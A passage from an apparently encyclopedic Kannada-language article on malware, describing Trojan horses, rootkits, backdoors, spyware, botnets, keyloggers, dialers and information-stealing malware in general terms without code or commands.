ಟ್ರೋಜನ್‌ನ ತಂತ್ರವಾಗಿದೆ.

ವಿಶಾಲವಾಗಿ ಹೇಳಬೇಕೆಂದರೆ, ಟ್ರೋಜನ್ ಹಾರ್ಸು ಒಂದು ಪ್ರೊಗ್ರಾಮ್ ಆಗಿದ್ದು ಅದು ಬಳಕೆದಾರರನ್ನು ತನ್ನನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಆಹ್ವಾನಿಸುತ್ತದೆ. ಜೊತೆಗೆ ಪೀಡಕ ಅಥವಾ ದುರಾಗ್ರಹ ಪೇಲೋಡ್‌ ಅನ್ನು ಗುಪ್ತ ಅಡಕವನ್ನಾಗಿ ಒಳಗೊಂಡಿರುತ್ತದೆ. ಈ ಪೇಲೋಡ್‌ ತಕ್ಷಣವೇ ಸಕ್ರಿಯಗೊಂಡು ಅನಪೇಕ್ಷಿತ ಪರಿಣಾಮಗಳನ್ನು ತೋರಿಸಬಹುದು. ಹೇಗೆಂದರೆ ಬಳಕೆದಾರನ ಕಡತಗಳನ್ನು ಡಿಲೀಟ್ ಮಾಡುವುದಾಗಿರಬಹುದು ಅಥವಾ ಮುಂದೆ ದುರಾಗ್ರಹದ/ಅನಪೇಕ್ಷಿತ ತಂತ್ರಾಂಶಗಳನ್ನು ಸ್ಥಾಪನೆಗೊಳಿಸುವುದಾಗಿರಬಹುದು. ಡ್ರಾಪರ್ ಎಂದು ಕರೆಯಲ್ಪಡುವ ಟ್ರೋಜನ್ ಹಾರ್ಸು, ವರ್ಮುಗಳನ್ನು ಬಳಕೆದಾರನ ಸ್ಥಳೀಯ ಸಂಪರ್ಕಜಾಲದೊಳಗೆ ತೂರಿಸಿ ವರ್ಮುಗಳ ಏಕಾಏಕಿ ಆರಂಭಕ್ಕೆ ಕಾರಣವಾಗಬಹುದು.

ಸ್ಪೈವೇರನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ಹೆಚ್ಚು ಬಾರಿ ಟ್ರೋಜೊನ್ ಹಾರ್ಸುಗಳ ಮುಖೇನ ಪಸರಿಸಲಾಗುತ್ತದೆ. ಇವುಗಳನ್ನು ಅಪೇಕ್ಷಣೀಯ ತಂತ್ರಾಂಶದ ಜೊತೆಗೆ ಸೇರ್ಪಡೆ ಮಾಡಿ, ಬಳಕೆದಾರ ಅಂತರಜಾಲದಿಂದ ಡೌನ್‌ಲೋಡ್ ಮಾಡುವಂತೆ ಮಾಡಲಾಗುತ್ತದೆ. ಬಳಕೆದಾರ ಈ ತಂತ್ರಾಂಶವನ್ನು ಸ್ಥಾಪನೆ ಮಾಡಿದಾಗ ಇದರ ಜೊತೆಯಲ್ಲಿ ಸ್ಪೈವೇರ್ ಸಹ ಸ್ಥಾಪನೆಯಾಗುತ್ತದೆ. ಸ್ಪೈವೇರಿನ ಕತೃಗಳು ತಮ್ಮ ಕೆಲಸವನ್ನು ಶಾಸನಬದ್ಧವಾಗಿರುವಂತೆ ಮರೆಮಾಚಲು ಎಂಡ್ ಯುಸರ್ ಲೈಸನ್ಸ್ ಅಗ್ರಿಮೆಂಟ್‌ನ ಮೊರೆ ಹೋಗುತ್ತಾರೆ. ಇದರಲ್ಲಿ ಸ್ಪೈವೇರಿನ ನಡುವಳಿಕೆಗಳನ್ನು ಹಗುರವಾಗಿ ಪರಿಗಣಿಸಿ ಬರೆಯಲಾಗಿದ್ದು ಅದನ್ನು ಬಳಕೆದಾರ ಓದಿ ಅರ್ಥ ಮಾಡಿಕೊಂಡು ಗುರುತಿಸಲು ಅಸಮರ್ಥವಾಗುವಂತೆ ಮಾಡಿರುತ್ತಾರೆ.

ರೂಟ್‌ಕಿಟ್‌ಗಳು

[ಬದಲಾಯಿಸಿ]

ಒಂದು ಸಲ ದುರಾಗ್ರಹದ ಪ್ರೊಗ್ರಾಮ್‌ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿ ಸ್ಥಾಪನೆಯಾದ ನಂತರದಲ್ಲಿ, ಅದು ಪತ್ತೆ ಆಗದಂತೆ ಮತ್ತು ಸೋಂಕು ರಹಿತವಾಗದಿರಲು, ಅದು ಗುಪ್ತ ಅಡಕವಾಗಿ ಸ್ಟೇ ಆಗಿರುವುದು ಬಹಳ ಅವಶ್ಯಕ. ಇದು ಮನುಷ್ಯ ಆಕ್ರಮಣಕಾರ ಗಣಕಕ್ಕೆ ನೇರವಾಗಿ ದಾಳಿ ಇಟ್ಟಾಗ ಸಹ ಅನ್ವಯವಾಗುತ್ತದೆ. ರೂಟ್‌ಕಿಟ್ ಎಂದು ಕರೆಯಲ್ಪಡುವ ತಂತ್ರಗಳು ಈ ರೀತಿಯ ಗುಪ್ತ ಅಡಕಗಳಿಗೆ, ಅತಿಥೇಯ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗಳಲ್ಲಿ ಬದಲಾವಣೆಯನ್ನು ಮಾಡಿಕೊಟ್ಟು ಮಾಲ್‌ವೇರ್‌ಗಳಿಗೆ ಬಳಕೆದಾರನಿಂದ ಅಡಗಿ ಕುಳಿತುಕೊಳ್ಳಲು ದಾರಿ ಮಾಡುಕೊಡುತ್ತವೆ. ರೂಟ್‌ಕಿಟ್‌ಗಳು ದುರಾಗ್ರಹದ‍ ಪ್ರೊಸೆಸ್ ಅನ್ನು ಸಿಸ್ಟಮ್‌ನ ಪ್ರೊಸೆಸ್‌ಗಳ ಪಟ್ಟಿಯಲ್ಲಿ ಕಾಣದಂತೆ ಅಥವಾ ಇದರ ಕಡತಗಳನ್ನು ಓದದಂತೆ ಪ್ರತಿಬಂಧಿಸುತ್ತವೆ. ಮೂಲವಾಗಿ ರೂಟ್‌ಕಿಟ್ ಎನ್ನುವುದು ಟೂಲುಗಳ ಒಂದು ಗುಂಪಾಗಿದ್ದು ಇದನ್ನು ಯುನಿಕ್ಸ್ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿ ಆಕ್ರಮಣಕಾರನೊಬ್ಬ ಆಡಳಿತಾಧಿಕಾರಿಯ(ರೂಟ್) ಪ್ರವೇಶಾಧಿಕಾರವನ್ನು ಪಡೆದುಕೊಂಡು ಸ್ಥಾಪನೆ ಮಾಡಿದ್ದ. ಇವತ್ತಿನ ದಿನದಲ್ಲಿ ಈ ಹೆಸರನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ದುರಾಗ್ರಹದ ಪ್ರೊಗ್ರಾಂಗಳ ಗುಪ್ತ ಅಡಕಗಳ ನಿಯತ ಕಾರ್ಯಗಳಿಗೆ ಹೆಸರಿಸಲು ಬಳಸಲಾಗುತ್ತಿದೆ.

ಕೆಲವು ದುರಾಗ್ರಹದ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ನಿಯತ ಕಾರ್ಯಗಳನ್ನು ಹೊಂದಿದ್ದು ಅದು ಅದನ್ನು ರಿಮೂವಲ್‌ಗಳಿಂದ ರಕ್ಷಿಸುವುದಲ್ಲದೆ ಅವುಗಳನ್ನು ಹಿಮ್ಮೆಟ್ಟಿಸುತ್ತದೆ. ಈ ನಡುವಳಿಕೆಯ ಉದಾಹರಣೆಯನ್ನು ಮೊದಲು ದಾಖಲಿಸಿದ್ದು ಜಾರ್ಗನ್ ಫೈಲ್, ಇದು ಎರಡು ಜೊತೆಯ ಪ್ರೊಗ್ರಾಮ್‌ಗಳು ಒಂದು ಜೆರಾಕ್ಸ್‌ ಸಿಪಿ-ವಿ ಟೈಮ್‌ಶೇರಿಂಗ್ ಸಿಸ್ಟಮ್‌ನ್ನು ಪೀಡಿಸುತ್ತಿದ್ದಾಗಿನ ಕತೆಯಾಗಿದೆ.

ಪ್ರತಿಯೊಂದು ಗೋಸ್ಟ್‌ನ ಕಾರ್ಯವು ಇತರ ಬೇರೆಯದ್ದು ಕೊಲ್ಲಲ್ಪಟ್ಟಿದೆ ಎನ್ನುವುದನ್ನು ನೋಡುವುದು ಆಗಿದೆ. ಮತ್ತು ಇತ್ತೀಚೆಗೆ ಹಾಳಾದ ಪ್ರೊಗ್ರಾಮ್ ಅನ್ನು ಕೆಲವೇ ಮಿಲಿ ಸೆಕೆಂಡುಗಳಲ್ಲಿ ಕಾಪಿ ಮಾಡುವುದಕ್ಕೆ ಪ್ರಾರಂಭಿಸುತ್ತದೆ. ಎರಡು ಘೋಸ್ಟ್‌ಗಳನ್ನು ಕೊಲ್ಲುವ ಒಂದೇ ಮಾರ್ಗವೆಂದರೆ, ಅವುಗಳನ್ನು ಕೊಲ್ಲುವುದು (ಅತ್ಯಂತ ಕಷ್ಟಕರವಾದುದು) ಅಥವಾ ನೇರವಾಗಿ ಗಣಕವನ್ನೇ ಹಾಳು ಮಾಡಬಹುದು.[]

ಇದೇ ರೀತಿಯ ಹಲವಾರು ಆಧುನಿಕ ತಂತ್ರಗಳನ್ನು ಮಾಲ್‌‌‍ವೇರ್‌ಗಳಿಂದ ಬಳಕೆಯಾಗಲ್ಪಡುತ್ತಿದೆ. ಅವುಗಳಲ್ಲಿ ಒಬ್ಬರಿಂದ ಇನ್ನೊಬ್ಬರಿಗೆ ಅಗತ್ಯವಾಗುವ ಹಲವಾರು ಪ್ರಕ್ರಿಯೆಗಳ ಮೇಲೆ ಗಮನವಿಡುವ ಮತ್ತು ಪುನರ್ ಸ್ಥಾಪಿಸುವುದನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತವೆ.

ಬ್ಯಾಕ್‌ಡೋರ್ಸ್

[ಬದಲಾಯಿಸಿ]

ಬ್ಯಾಕ್‌ಡೋರ್ ಎನ್ನುವುದು ಸಾಮಾನ್ಯ ದೃಢೀಕರಣ ಕಾರ್ಯವಿಧಾನದ ಹೊತ್ತಿನಲ್ಲಿ ಬಳಸಬಹುದಾದ ಉಪಮಾರ್ಗದ ವಿಧಾನವಾಗಿದೆ. ಒಂದು ಸಲ ಸಿಸ್ಟಮ್‌ ಜೊತೆ ರಾಜಿ ಮಾಡಿಕೊಂಡ ಮೇಲೆ (ಮೇಲಿನ ಯಾವುದೇ ಒಂದು ವಿಧಾನದಲ್ಲಿ ಅಥವಾ ಬೇರೆ ರೀತಿಯಲ್ಲಿ), ಒಂದು ಅಥವಾ ಅನೇಕ ಬ್ಯಾಕ್‌ಡೋರ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಿ ಭವಿಷ್ಯದಲ್ಲಿ ಸುಲಭವಾಗಿ ಪ್ರವೇಶಾಧಿಕಾರ ಪಡೆಯಲು ಸಾಧ್ಯವಾಗುವಂತೆ ನೋಡಿಕೊಳ್ಳಬಹುದು. ದುರಾಗ್ರಹದ ತಂತ್ರಾಂಶಗಳಿಗಿಂತ ಮುನ್ನ ಬ್ಯಾಕ್‌ಡೋರ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಿ ಆಕ್ರಮಣಕಾರರಿಗೆ ದಾರಿ ಮಾಡಿಕೊಡಬಹುದು.

ಗಣಕ ಉತ್ಪಾದಕರು ತಮ್ಮ ಸಿಸ್ಟಮ್‌ಗಳಲ್ಲಿ ಗ್ರಾಹಕರಿಗೆ ಟೆಕ್ನಿಕಲ್ ಸಪೋರ್ಟ್ ಕೊಡಲು ಮೊದಲೇ ಬ್ಯಾಕ್‍ಡೋರ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಿರುತ್ತಾರೆ ಎಂಬ ಅಭಿಪ್ರಾಯವನ್ನು ಹಲವು ಬಾರಿ ಹೊಂದಲಾಗಿದೆ. ಆದರೆ ಇದನ್ನು ಯಾವತ್ತೂ ಪರೀಕ್ಷಿಸಲಾಗಿಲ್ಲ. ಕ್ರಾಕರ್‌ಗಳು, ಗಣಕದ ಪರೋಕ್ಷ ಪ್ರವೇಶಾಧಿಕಾರವನ್ನು ಪಡೆಯುವ ಜೊತೆಗೆ ಸಾಂಧರ್ಬಿಕ ತಪಾಸಣೆಯ ಹೊತ್ತಿನಲ್ಲಿ ಅಡಗಿಕೊಳ್ಳಲು ವಿಶಿಷ್ಟವಾಗಿ ಬ್ಯಾಕ್‍ಡೋರ್‌ಗಳನ್ನು ಬಳಸುತ್ತಾರೆ. ಬ್ಯಾಕ್‍ಡೋರ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಲು ಕ್ರಾಕರ್‌ಗಳು ಟ್ರೋಜೊನ್ ಹಾರ್ಸುಗಳು, ವರ್ಮುಗಳು ಅಥವಾ ಇನ್ಯಾವುದೇ ವಿಧಾನಗಳನ್ನು ಬಳಸಬಹುದು.

ಲಾಭಕ್ಕಾಗಿ ಮಾಲ್‌ವೇರ್‌: ಸ್ಪೈವೇರ್‌, ಬಾಟ್‌ನೆಟ್ಸ್‌, ಕೀಸ್ಟ್ರೋಕ್‌ಲಾಗರ್ಸ್, ಮತ್ತು ಡೈಯಲರ್ಸ್

[ಬದಲಾಯಿಸಿ]

೧೯೮೦ ಮತ್ತು ೧೯೯೦ರ ಸಮಯದಲ್ಲಿ, ದುರಾಗ್ರಹದ ಪ್ರೋಗ್ರಾಮ್‌ಗಳನ್ನು ವಿಧ್ವಂಸಕ ಅಥವಾ ಕುಚೇಷ್ಟೆಯ ಕೆಲಸ ಎಂದು ಭಾವಿಸಲಾಗಿತ್ತು. ತೀರಾ ಇತ್ತೀಚೆಗೆ, ಬಹುಪಾಲು ಮಾಲ್‌ವೇರ್‌ ಪ್ರೋಗ್ರಾಮ್‌ಗಳನ್ನು ಆರ್ಥಿಕ ಅಥವಾ ಲಾಭದ ದೃಷ್ಟಿಯನ್ನಿಟ್ಟುಕೊಂಡು ಮಾಡಲಾಗುತ್ತದೆ. ಇದನ್ನು, ಸೋಂಕಿನ ಸಿಸ್ಟಮ್‌ಗಳ (ಗಣಕಗಳ) ಮೇಲಿನ ತಮ್ಮ ಹಿಡಿತದಿಂದ ಲಾಭ ಮಾಡಿಕೊಳ್ಳುವ, ಆ ಹಿಡಿತವನ್ನೇ ಒಂದು ಹಣದ ಮೂಲವನ್ನಾಗಿ ಮಾಡಿಕೊಳ್ಳುವ ಮಾಲ್‌ವೇರ್‌ನ ನಿರ್ಮಾತೃವಿನ ಇಚ್ಛೆ ಎಂದು ಭಾವಿಸಬಹುದು.

ಸ್ಪೈವೇರ್‌ ಪ್ರೋಗ್ರಾಮುಗಳನ್ನು ಗಣಕ ಬಳಕೆದಾರರ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸುವುದಕ್ಕಾಗಿ ವ್ಯವಹಾರಿಕವಾಗಿ ನಿರ್ಮಿಸಲಾಗುತ್ತದೆ, ಸ್ಪೈವೇರ್‌ಗಳ ನಿರ್ಮಾತೃಗಳ ಲಾಭಕ್ಕಾಗಿ, ಬಳಕೆದಾರರಿಗೆ ಪಾಪ್-ಅಪ್‌ ಜಾಹೀರಾತುಗಳನ್ನು ತೋರಿಸುವುದು, ಅಥವಾ ವೆಬ್‌-ಬ್ರೌಸರ್‌ಗಳ ವರ್ತನೆಯನ್ನು ಬದಲಾಯಿಸುವುದು. ಉದಾಹರಣೆಗೆ, ಕೆಲವು ಸ್ಪೈವೇರ್‌ ಪ್ರೋಗ್ರಾಮುಗಳು ಸರ್ಚ್‍ ಎಂಜಿನ್‌ ಅನ್ನು ಪಾವತಿಸಿದ ಜಾಹೀರಾತುಗಳಿಗೆ ಮಾರ್ಗ ಬದಲಿಸುತ್ತವೆ (ರೀಡೈರೆಕ್ಟ್‌ ಮಾಡುತ್ತವೆ). ಮಾಧ್ಯಮದವರು ಸಾಮಾನ್ಯವಾಗಿ "ಸ್ಟೀಲ್‌ವೇರ್‌" ಎಂದು ಕರೆಯುವ ಮತ್ತೆ ಕೆಲವು ಪ್ರೋಗ್ರಾಮ್‌ಗಳು, ಹಣ ತಲುಪಬೇಕಾದವರಿಗೆ ಬದಲಾಗಿ ಸ್ಪೈ‌ವೇರ್‌ ‌ನಿರ್ಮಾತೃವಿಗೆ ತಲುಪುವಂತೆ ಸಂಯೋಜಿತ ಮಾರ್ಕೆಟಿಂಗ್‌ನ ತಂತ್ರಲಿಪಿಯನ್ನು ತಿದ್ದಿಬಿಡುತ್ತವೆ.

ಸ್ಪೈವೇರ್‌ ಪ್ರೋಗ್ರಾಮುಗಳನ್ನು ಕೆಲವು ಸಲ ಯಾವುದಾದರೊಂದು ಟ್ರೋಜನ್‌ ಹಾರ್ಸ್‌ನ ಮಾದರಿಯಲ್ಲಿ ಅಳವಡಿಸಲಾಗುತ್ತದೆ. ಇದರ ಒಂದೇ ವ್ಯತ್ಯಾಸವೆಂದರೆ, ತನ್ನ ನಿರ್ಮಾತೃಗಳು ಬಹಿರಂಗವಾಗಿ ತಮ್ಮನ್ನು ತಾವು ವ್ಯವಹಾರಿಗಳೆಂದು ತೋರಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಉದಾಹರಣೆಗೆ, ಮಾಲ್‌ವೇರ್‌ಗಳು ತಯಾರಿಸಿದ ಪಾಪ್‌-ಅಪ್‌‍ ಜಾಗಗಳನ್ನು ಮಾರಾಟ ಮಾಡುವುದರ ಮೂಲಕ. ಇಂತಹ ಬಹುತೇಕ ಪ್ರೋಗ್ರಾಮ್‌ಗಳು ಬಳಕೆದಾರನಿಗೆ, ಗಣಕ ಮಲಿನಜನಕ ಕಾಯ್ದೆಯಿಂದ ತನ್ನ ನಿರ್ಮಾತೃವನ್ನು ಶಿಕ್ಷೆಯಿಂದ ರಕ್ಷಿಸಲು ಅಂತಿಮ-ಬಳಕೆದಾರನ ಪರವಾನಗಿ ಒಪ್ಪಂದವನ್ನು ಕೊಡುತ್ತವೆ. ಆದರೆ, ಸ್ಪೈವೇರ್‌ EULAಗಳು ಕೋರ್ಟಿನಲ್ಲಿ ನಿಂತಿಲ್ಲ.

ಆರ್ಥಿಕ ಲಾಭಕ್ಕೋಸ್ಕರ ಮಾಲ್‌ವೇರ್‌ಗಳನ್ನು ತಯಾರಿಸುವವರು ಲಾಭ ಮಾಡಬಹುದಾದ ಇನ್ನೊಂದು ಮಾರ್ಗವೆಂದರೆ, ತಾವು ಸೋಂಕಿತಗೊಳಿಸಿದ ಗಣಕಗಳನ್ನೇ ತಮ್ಮ ಕೆಲಸಕ್ಕಾಗಿ ಬಳಸಿಕೊಳ್ಳುವುದು. ಸೋಂಕಿತ ಗಣಕಗಳನ್ನು ಸ್ಪಾಮ್‌ ಮೆಸೇಜ್‌ಗಳನ್ನು ಕಳುಹಿಸಲು ಬದಲಿ ಪ್ರತಿನಿಧಿ (ಪ್ರಾಕ್ಸಿ)ಗಳನ್ನಾಗಿ ಬಳಸುವುದು. ಈ ಸ್ಥಿತಿಯಲ್ಲಿರುವ ಗಣಕಗಳನ್ನು ಸಾಮಾನ್ಯವಾಗಿ ಜೋಂಬಿ ಗಣಕಗಳೆಂದು ಕರೆಯಲಾಗುತ್ತದೆ. ಸೋಂಕಿತ ಗಣಕಗಳನ್ನು ಬಳಸುವುದರಿಂದ ಈ ಸ್ಪಾಮ್‌ ಮಾಡುವವರಿಗೆ ಲಾಭವೇನೆಂದರೆ, ಆ ಗಣಕಗಳು ಅನಾಮಧೇಯತೆಯನ್ನು ಕೊಡುತ್ತವೆ, ಅವರನ್ನು ಶಿಕ್ಷೆಯಿಂದ ರಕ್ಷಿಸುತ್ತವೆ. ಸ್ಪಾಮ್‌ ಮಾಡುವವರು ಸೋಂಕಿತ ಗಣಕಗಳನ್ನು, ಹಂಚಿಕೆಯಾದ ಸೇವೆಯ ನಿರಾಕರಣೆಯ ಆಘಾತ(ಡಿಸ್ಟ್ರಿಬ್ಯೂಟೆಡ್‌ ಡಿನೈಯಲ್‌ ಆಫ್‌ ಸರ್ವಿಸ್‌ ಅಟ್ಯಾಕ್‌)ಗಳನ್ನೊಳಗೊಂಡ ಸ್ಪಾಮ್‌ ವಿರೋಧಿ ಸಂಸ್ಥೆಗಳನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಳ್ಳಲು ಬಳಸಲಾಗುತ್ತದೆ.

ಹಲವು ಸೋಂಕಿತ ಗಣಕಗಳ ಚಟುವಟಿಕೆಯನ್ನು ಕ್ರೋಢೀಕರಿಸಲು, ಘಾತಕರು ’ಬಾಟ್‌ನೆಟ್‌ಗಳು ’ಎನ್ನುವ ಕ್ರೋಢೀಕರಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಬಳಸಿದ್ದಾರೆ. ಒಂದು ಬಾಟ್‌ನೆಟ್‌ನಲ್ಲಿ, ಮಾಲ್‌ವೇರ್‌ ಅಥವಾ ಮಾಲ್‌ಬಾಟ್‌ ಇಂಟರ್‌ನೆಟ್‌ ರಿಲೇ ಚಾಟ್‌ ವಾಹಿನಿಗೆ ಅಥವಾ ಬೇರೆ ಯಾವುದಾದರೂ ಚಾಟ್ ವ್ಯವಸ್ಥೆಗೆ ಲಾಗ್‌ ಇನ್‌ ಆಗುತ್ತದೆ. ಆಗ, ಘಾತಕನು ಎಲ್ಲಾ ಸೋಂಕಿತ ಗಣಕಗಳಿಗೂ ಒಂದೇ ಬಾರಿಗೆ ಸೂಚನೆಗಳನ್ನು ಕೊಡಬಹುದು. ಹೊಸ ಮಾಲ್‌ವೇರ್‍ಗಳನ್ನು ಗಣಕಕ್ಕೆ ಕಳುಹಿಸಲು ಕೂಡ ಬಾಟ್‌ನೆಟ್‌ಗಳನ್ನು ಬಳಸಬಹುದು, ಹೀಗೆ ಮಾಡುವುದರಿಂದ ಅವು ವೈರಸ್‌ ವಿರೋಧಿ ತಂತ್ರಾಂಶಗಳು ಮತ್ತು ಇತರೆ ಸುರಕ್ಷತಾ ಕ್ರಮಗಳನ್ನು ಪ್ರತಿಬಂಧಿಸುವುದು.

ಮಾಲ್‌ವೇರ್‌ ನಿರ್ಮಾತೃವು ತನ್ನ ಮಾಲ್‌ವೇರ್‌ಗೆ ಬಲಿಯಾದ ವ್ಯಕ್ತಿಗಳಿಂದ ಸೂಕ್ಷ್ಮವಾದ ವಿಷಯಗಳನ್ನು ಕದಿಯುವ ಮೂಲಕ ಲಾಭ ಮಾಡಬಹುದು. ಕೆಲವು ಮಾಲ್‌ವೇರ್‌ ಪ್ರೋಗ್ರಾಮ್‌ಗಳು ಕೀ ಲಾಗರ್‌ ಗಳನ್ನು ಅಳವಡಿಸಿರುತ್ತವೆ, ಇವು ಬಳಕೆದಾರನು ಪಾಸ್‍ವರ್ಡ್, ಕ್ರೆಡಿಟ್‌ ಕಾರ್ಡ್ ಸಂಖ್ಯೆ, ಅಥವಾ ಬೇರಾವುದೇ ಮಾಹಿತಿಯನ್ನು ಟೈಪ್‌ ಮಾಡುವಾಗ ಮಧ್ಯ ನುಸುಳುತ್ತವೆ, ಮತ್ತು ಅವು ಅಂತಹ ಮಾಹಿತಿಯನ್ನು ದುರುಪಯೋಗಪಡಿಸಿಕೊಳ್ಳಬಹುದು. ನಂತರ, ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಈ ಮಾಹಿತಿಯನ್ನು ಮಾಲ್‌ವೇರ್‌ ನಿರ್ಮಾತೃವಿಗೆ ರವಾನಿಸಲಾಗುತ್ತದೆ, ಇದರಿಂದ ಕ್ರೆಡಿಟ್‌ ಕಾರ್ಡ್‌ ದರೋಡೆ ಮತ್ತು ಇತರೆ ಕಳ್ಳತನಗಳು ಸಾಧ್ಯವಾಗುತ್ತದೆ. ಹಾಗೆಯೇ, ಮಾಲ್‌ವೇರ್‌ಗಳು ಸಿಡಿ ಕೀಯನ್ನು ಅಥವಾ ಆನ್‌ಲೈನ್‌ ಆಟಗಳ ಪಾಸ್‌ವರ್ಡ್‌ ಅನ್ನು ಕಾಪಿ ಮಾಡಿಬಿಡಬಹುದು, ಇದರಿಂದ ನಿರ್ಮಾತೃವು ಅಕೌಂಟ್‌ಗಳನ್ನು ಅಥವಾ ವರ್ಚುವಲ್‌‌ ವಸ್ತುಗಳನ್ನು ಕದ್ದುಬಿಡಬಹುದು.

ಸೋಂಕಿತ ಗಣಕನ ಯಜಮಾನನಿಂದ ಹಣ ಕದಿಯುವ ಮತ್ತೊಂದು ಮಾರ್ಗವೆಂದರೆ ಡಯಲ್‌-ಅಪ್‌. ಡಯಲರ್‌ (ಅಥವಾ ಸೋಂಕಿತ ಡಯಲರ್‌ ) ತಂತ್ರಾಂಶವು ಒಂದು ಪ್ರೀಮಿಯಂ‌-ರೇಟ್‌ ದೂರವಾಣಿ ಸಂಖ್ಯೆಯನ್ನು, ಉದಾಹರಣೆಗೆ ಯುಎಸ್‌ "೯೦೦ ಸಂಖ್ಯೆ"ಯನ್ನು ಡಯಲ್‌ಮಾಡಿ ಕರೆಯನ್ನು ಹಾಗೆಯೇ ಬಿಟ್ಟುಬಿಡುತ್ತದೆ, ಕರೆಯ ದರವು ಸೋಂಕಿತ ಬಳಕೆದಾರನಿಗೆ ಹೋಗುತ್ತದೆ.

ಮಾಹಿತಿ-ಕದಿಯುವ ಮಾಲ್‌ವೇರ್

[ಬದಲಾಯಿಸಿ]

ದತ್ತಾಂಶ-ಕದಿಯುವ ಮಾಲ್‌ವೇರ್ ಒಂದು ಜಾಲ ಭೀತಿಯಾಗಿದ್ದು, ಇದು ಬಲಿಪಶುವಿನ ಖಾಸಗಿ ಮತ್ತು ಸ್ವಾಮ್ಯದ ಮಾಹಿತಿಗಳನ್ನು ಕಸಿದುಕೊಂಡು ಕದ್ದ ಮಾಹಿತಿಗಳನ್ನು ನೇರವಾಗಿ ಉಪಯೋಗಿಸಿ ಅಥವಾ ಭೂಗತವಾಗಿ ಹಂಚಿ ಹಣ ಮಾಡುವ ಉದ್ದೇಶವನ್ನು ಹೊಂದಿದೆ. ಇದರ ಅಡಿಯಲ್ಲಿ ಬರುವ ಕಾಂಟೆಂಟ್ ಭದ್ರತೆಯ ಅಪಾಯಗಳೆಂದರೆ ಕೀಲಾಗರ್ಸ್, ಸ್ಕ್ರೀನ್ ಸ್ಕ್ರಾಪರ್ಸ್, ಸ್ಪೈವೇರ್, ಆ‍ಯ್‌ಡ್‌ವೇರ್, ಬ್ಯಾಕ್‌ಡೋರ್ಸ್ ಮತ್ತು ಬೊಟ್ಸ್. ಈ ಹೆಸರು ಉಳಿದ ಚಟುವಟಿಕೆಗಳಾದ ಸ್ಪಾಮ್, ಫಿಶಿಂಗ್, ಡಿಎನ್‌‍ಎಸ್ ಪಾಯಿಸನಿಂಗ್, SEO ಅಬ್ಯೂಸ್, ಇತ್ಯಾದಿಗಳಿಗೆ ಅನ್ವಯಿಸುವುದಿಲ್ಲ. ಹಾಗಿದ್ದೂ ಈ ಅಪಾಯಗಳು, ಸಾಮಾನ್ಯವಾದ ಹೈಬ್ರಿಡ್‌ ಘಾತಕಗಳು ಮಾಡುವಂತೆ, ಕಡತವನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಿಕೊಳ್ಳುವುದರಲ್ಲಿಯೋ ಅಥವಾ ನೇರವಾಗಿ ಇನ್‌ಸ್ಟಾಲ್‌ ಮಾಡಿಕೊಳ್ಳುವುದರಲ್ಲಿಯೋ ಪರಿಣಮಿಸುತ್ತದೆ, ಯಾವ ಕಡತಗಳು ಈ ನಕಲಿ (ಪ್ರಾಕ್ಸಿ) ಮಾಹಿತಿಯ ದಳ್ಳಾಳಿಯಾಗಿ ವರ್ತಿಸುತ್ತವೆಯೋ, ಅವು ಮಾಹಿತಿ ಕದಿಯುವ ಮಾಲ್‌ವೇರ್‌ಗಳ ಗುಂಪಿಗೆ ಸೇರುತ್ತವೆ.

ಮಾಹಿತಿ-ಕದಿಯುವ ಮಾಲ್‌ವೇರ್‌ನ ಲಕ್ಷಣಗಳು

[ಬದಲಾಯಿಸಿ]

ಘಟನೆಯ ಕುರುಹನ್ನು ಉಳಿಸುವುದಿಲ್ಲ

  • ಮಾಲ್‌ವೇರ್‌ಗಳು ಸಾಮಾನ್ಯವಾಗಿ ನಿಯತವಾಗಿ ಖಾಲಿಮಾಡುವ ಸಂಗ್ರಹದಲ್ಲಿ ಶೇಖರವಾಗಿರಬಹುದು
  • ಮಾಲ್‌ವೇರ್‌‌ಗಳು ಡ್ರೈವ್-ಬೈ-ಡೌನ್‌ಲೋಡ್ ಮೂಲಕ ಸ್ಥಾಪಿತವಾಗಿರಬಹುದು.
  • ಮಾಲ್‌ವೇರ್‌ನ್ನು ಹೋಸ್ಟ್ ಮಾಡುವ ಜಾಲತಾಣ ಮತ್ತು ಮಾಲ್‌ವೇರ್ ಎರಡೂ ತಾತ್ಕಲಿಕವಾದದ್ದು ಅಥವಾ ದುಷ್ಟವಾದದ್ದು

ಆಗಾಗ ಬದಲಾಗುತ್ತದೆ ಮತ್ತು ಅದರ ಕೆಲಸಗಳನ್ನು ವಿಸ್ತರಿಸುತ್ತದೆ

  • ವೈರಸ್-ವಿರೋಧಿ ತಂತ್ರಾಂಶಗಳಿಗೆ ಮಾಲ್‌ವೇರ್‌ನ ವಿವಿಧ ಘಟಕಗಳ ಸಂಯೋಜನೆಗಳಿಂದಾಗಿ, ಅಂತಿಮ ಪೇಲೋಡ್ ಗುಣಲಕ್ಷಣಗಳನ್ನು ಕಂಡುಹಿಡಿಯಲು ಕಷ್ಟವಾಗುತ್ತದೆ
  • ಮಾಲ್‌ವೇರ್ ಬಹುಕಡತ ಗೂಢಲಿಪೀಕರಣ(ಎನ್‌ಕ್ರಿಪ್‌ಷನ್‌)ಮಟ್ಟಗಳನ್ನು ಬಳಸುತ್ತದೆ

